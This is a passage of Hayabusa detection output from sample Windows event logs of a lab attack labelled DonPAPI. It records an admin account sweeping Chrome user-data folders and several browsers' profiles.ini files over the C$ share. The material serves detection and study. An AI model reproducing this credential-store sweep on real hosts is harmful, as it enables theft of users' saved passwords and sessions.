extraction.evtx 2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 
10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.830 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.851 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx 2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 
10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE 
Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.932 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.950 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 